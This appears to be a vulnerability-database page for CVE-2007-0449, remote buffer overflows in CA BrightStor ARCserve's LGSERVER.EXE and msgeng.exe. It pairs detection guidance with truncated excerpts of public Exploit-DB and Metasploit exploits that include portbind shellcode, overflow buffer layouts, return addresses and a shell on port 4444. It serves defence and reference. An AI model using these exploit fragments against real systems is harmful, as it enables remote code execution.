CVE-2007-0449
published 2007-01-23CVE-2007-0449: Multiple buffer overflows in LGSERVER.EXE in CA BrightStor ARCserve Backup for Laptops and Desktops r11.0 through r11.1 SP1, Mobile Backup r4.0, Desktop and…
PriorityP268critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
79.24%
99.6th percentile
Multiple buffer overflows in LGSERVER.EXE in CA BrightStor ARCserve Backup for Laptops and Desktops r11.0 through r11.1 SP1, Mobile Backup r4.0, Desktop and Business Protection Suite r2, and Desktop Management Suite (DMS) r11.0 and r11.1 allow remote attackers to execute arbitrary code via crafted packets to TCP port (1) 1900 or (2) 2200.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| broadcom | brightstor_arcserve_backup_laptops_desktops | — | — |
| broadcom | brightstor_arcserve_backup_laptops_desktops | — | — |
| broadcom | brightstor_mobile_backup | — | — |
| broadcom | business_protection_suite | — | — |
| broadcom | desktop_management_suite | — | — |
| broadcom | desktop_management_suite | — | — |
| broadcom | desktop_protection_suite | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect exploit attempts against LGSERVER.EXE by monitoring for large crafted TCP connections to port 1900 or 2200 containing an initial 10-byte numeric prefix (e.g. '0000033000' or '0000016705') followed by a long NOP sled (~2322 bytes). ↗
- →Alert on TCP connections to port 1900 or 2200 targeting LGSERVER.EXE where the payload length significantly exceeds normal protocol bounds, indicative of a stack buffer overflow attempt. ↗
- →Monitor for outbound connections to TCP port 4444 from the LGSERVER.EXE process, which is the port bound by the exploit's portbind shellcode. ↗
- →The Metasploit module uses bad character filtering of '\x00\x0a\x0d\x5c\x5f\x2f\x2e' in the payload; network signatures should look for large payloads to port 1900 that avoid these bytes. ↗
- →The SEH-based exploit appends '\x58' * 0x4141 after the SEH overwrite; look for this pattern in TCP streams to port 1900. ↗
- ·The return address 0x75022ac4 is specific to Windows 2000 Pro English All; exploitability and ROP/SEH gadget addresses will differ on other OS versions. ↗
- ·The Metasploit module targets CA BrightStor ARCserve Backup for Laptops & Desktops 11.1 specifically; other versions in the affected range (r11.0–r11.1 SP1, Mobile Backup r4.0, DMS r11.0/r11.1) may require different offsets. ↗
- ·The exploit payload space is limited to 600 bytes and requires a stack adjustment of -3500; payloads exceeding this space or lacking the adjustment will fail. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
CA BrightStor ARCserve for Laptops & Desktops LGServer - Remote Buffer Overflow (Metasploit) (1)
exploitdb·2010-05-09
CVE-2007-0449 CA BrightStor ARCserve for Laptops & Desktops LGServer - Remote Buffer Overflow (Metasploit) (1)
CA BrightStor ARCserve for Laptops & Desktops LGServer - Remote Buffer Overflow (Metasploit) (1)
---
##
# $Id: lgserver.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
for Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could
overflow the buffer and execute arbitrary code.
},
'Author' => [
Exploit-DB
CA BrightStor ARCserve - 'lgserver.exe' Remote Stack Overflow
exploitdb·2007-02-01
CVE-2007-0449 CA BrightStor ARCserve - 'lgserver.exe' Remote Stack Overflow
CA BrightStor ARCserve - 'lgserver.exe' Remote Stack Overflow
---
#!/usr/bin/python
# Remote exploit for the CA BrightStor Arcserve stack overflow as
# described in http://www.securityfocus.com/archive/1/458648/30/0/threaded
#
#
# Winny Thomas ;-)
# Author shall bear no responsibility for any screw ups caused by using this code
#
import os
import sys
import socket
import struct
#Portbind shellcode; Binds shell on TCP port 4444
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode += "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54
Exploit-DB
CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (2)
exploitdb·2007-01-28
CVE-2007-0449 CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (2)
CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (2)
---
#!/usr/bin/perl
#
# original exploit by lssec.com this is a perl porting
#
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
$request = $uuid;
send $socket, $request, 0;
print "[+] Sent uuid request\n";
recv($socket, $reply, 1024, 0);
$request = $special.("\x90"x680).$jmp.$ret.$uef.$shellcode.("\x90"x1006)."\r\n";
send $socket, $request, 0;
print "[+] Sent malicius 1st request\n";
$request = $special.("\x90"x680).$jmp.$ret.$uef.$shellcode.("\x90"x1029)."\r\n";
send $socket, $request, 0;
print "[+] Sent malicius 2nd request\n";
print " + Connect on 4444 port of $host ...\n";
sleep(3);
system("telnet
Exploit-DB
CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (1)
exploitdb·2007-01-27
CVE-2007-0449 CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (1)
CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (1)
---
#!/usr/bin/python
# I couldnt find a reliable exploit for my analysis and so came up with this.
# Remote exploit for the CA BrightStor msgeng.exe service heap overflow
# vulnerability as described in LS-20060313.pdf on lssec.com. The exploit was
# tested on windows 2000 SP0. Opens a shell on TCP port 4444. Shouldnt be hard
# to port to other platforms. The exploit overwrites the
# UnhandledExceptionFilter in windows 2000 SP0 (located at 77EE044C) with the
# address of call dword ptr [esi +4C] located in user32.dll. At the time when
# UEF is called esi +4C contains a pointer to our shellcode.
#
# Winny M Thomas ;-)
# Author shall bear no responsibility for any screw ups caused by using this code
from impacket.dcerpc impor
Metasploit
CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow
metasploit
CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow
CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could overflow the buffer and execute arbitrary code.
No writeups or analysis indexed.
http://secunia.com/advisories/23897http://securitytracker.com/id?1017548http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asphttp://www.kb.cert.org/vuls/id/357308http://www.kb.cert.org/vuls/id/611276http://www.osvdb.org/31593http://www.securityfocus.com/archive/1/457945/30/8460/threadedhttp://www.securityfocus.com/archive/1/458644/100/0/threadedhttp://www.securityfocus.com/archive/1/458648/100/0/threadedhttp://www.securityfocus.com/bid/22199http://www.securityfocus.com/bid/22340http://www.securityfocus.com/bid/22342http://www.vupen.com/english/advisories/2007/0314http://www3.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=97696http://www3.ca.com/securityadvisor/vulninfo/Vuln.aspx?ID=34993https://exchange.xforce.ibmcloud.com/vulnerabilities/31704http://secunia.com/advisories/23897http://securitytracker.com/id?1017548http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asphttp://www.kb.cert.org/vuls/id/357308http://www.kb.cert.org/vuls/id/611276http://www.osvdb.org/31593http://www.securityfocus.com/archive/1/457945/30/8460/threadedhttp://www.securityfocus.com/archive/1/458644/100/0/threadedhttp://www.securityfocus.com/archive/1/458648/100/0/threadedhttp://www.securityfocus.com/bid/22199http://www.securityfocus.com/bid/22340http://www.securityfocus.com/bid/22342http://www.vupen.com/english/advisories/2007/0314http://www3.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=97696http://www3.ca.com/securityadvisor/vulninfo/Vuln.aspx?ID=34993https://exchange.xforce.ibmcloud.com/vulnerabilities/31704
2007-01-23
Published